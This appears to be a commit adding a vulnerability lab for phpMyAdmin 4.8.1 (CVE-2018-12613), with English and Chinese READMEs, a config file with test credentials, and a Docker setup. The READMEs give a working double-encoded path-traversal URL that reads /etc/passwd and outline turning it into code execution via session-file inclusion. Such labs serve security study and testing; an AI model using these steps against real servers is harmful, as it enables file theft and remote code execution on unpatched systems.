first commit

phpmyadmin/CVE-2018-12613/README.md

@@ -0,0 +1,30 @@
+# phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the `index.php`, causing  files iclusion vulnerabilitiy.
+
+Reference links:
+
+- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
+- https://www.phpmyadmin.net/security/PMASA-2018-4/
+
+## Setup
+
+Run the following command to start phpmyadmin 4.8.1:
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit `http://your-ip:8080`. The phpmyadmin is "config" mode, so we can login directly.
+
+## Exploit
+
+Visit `http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`, the result indicates that the file inclusion vulnerability exist:
+
+![](1.png)
+
+We can execute `SELECT '<?=phpinfo()?>';`, then check your sessionid (the value of phpMyAdmin in the cookie), and then include the session file:
+
+![](2.png)

phpmyadmin/CVE-2018-12613/README.zh-cn.md

@@ -0,0 +1,28 @@
+# phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）
+
+phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。
+
+参考文档：
+
+- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
+- https://www.phpmyadmin.net/security/PMASA-2018-4/
+
+## 漏洞环境
+
+执行如下命令，启动phpmyadmin 4.8.1：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`，即可进入phpmyadmin。配置的是“config”模式，所以无需输入密码，直接登录test账户。
+
+## 漏洞复现
+
+访问`http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`，可见`/etc/passwd`被读取，说明文件包含漏洞存在：
+
+![](1.png)
+
+利用方式也比较简单，可以执行一下`SELECT '<?=phpinfo()?>';`，然后查看自己的sessionid（cookie中phpMyAdmin的值），然后包含session文件即可：
+
+![](2.png)

phpmyadmin/CVE-2018-12613/config.inc.php

@@ -0,0 +1,28 @@
+<?php
+/*
+ * Generated configuration file
+ * Generated by: phpMyAdmin 4.6.2 setup script
+ * Date: Mon, 07 May 2018 10:48:03 +0000
+ */
+
+/* Servers configuration */
+$i = 0;
+
+/* Server: mysql [1] */
+$i++;
+$cfg['Servers'][$i]['verbose'] = 'mysql';
+$cfg['Servers'][$i]['host'] = 'mysql';
+$cfg['Servers'][$i]['port'] = 3306;
+$cfg['Servers'][$i]['socket'] = '';
+$cfg['Servers'][$i]['connect_type'] = 'tcp';
+$cfg['Servers'][$i]['auth_type'] = 'config';
+$cfg['Servers'][$i]['user'] = 'test';
+$cfg['Servers'][$i]['password'] = 'test';
+
+/* End of servers configuration */
+
+$cfg['blowfish_secret'] = '5af02eda401ae8.69737537';
+$cfg['DefaultLang'] = 'en';
+$cfg['ServerDefault'] = 1;
+$cfg['UploadDir'] = '';
+$cfg['SaveDir'] = '';

phpmyadmin/CVE-2018-12613/docker-compose.yml

@@ -0,0 +1,17 @@
+version: '2'
+services:
+ web:
+   image: vulhub/phpmyadmin:4.8.1
+   volumes:
+    - ./config.inc.php:/var/www/html/config.inc.php
+   ports:
+    - "8080:80"
+   depends_on:
+    - mysql
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_RANDOM_ROOT_PASSWORD=yes
+    - MYSQL_DATABASE=test
+    - MYSQL_USER=test
+    - MYSQL_PASSWORD=test